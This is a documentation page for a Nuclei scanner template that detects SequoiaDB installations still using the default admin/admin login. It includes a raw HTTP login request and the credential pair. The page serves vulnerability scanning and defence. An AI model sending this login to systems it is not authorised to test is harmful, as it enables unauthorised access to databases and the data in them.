SequoiaDB Default Login
ID: sequoiadb-default-login
Severity: high
Author: dhiyaneshDk
Tags: default-login,sequoiadb
Description
Section titled “Description”SequoiaDB default admin credentials were discovered.
YAML Source
Section titled “YAML Source”id: sequoiadb-default-login
info: name: SequoiaDB Default Login author: dhiyaneshDk severity: high description: SequoiaDB default admin credentials were discovered. reference: - https://www.sequoiadb.com/en/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 metadata: max-request: 1 tags: default-login,sequoiadb
http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Accept: */* X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 SdbLanguage: en
cmd=login&user={{username}}&passwd={{md5(password)}}
payloads: username: - admin password: - admin attack: pitchfork
matchers-condition: and matchers: - type: status status: - 200
- type: dsl dsl: - contains(tolower(header), 'sdbsessionid')
- type: word part: body words: - '{ "errno": 0 }'# digest: 490a004630440220399b797bc86509802185d28f40604fc3068ba2ff15ab6b11a98bc4961494990e0220767b5b23ee92285851bc45d879d00400ee1bd804c380d5796b3f19e82c166728:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/sequoiadb/sequoiadb-default-login.yaml"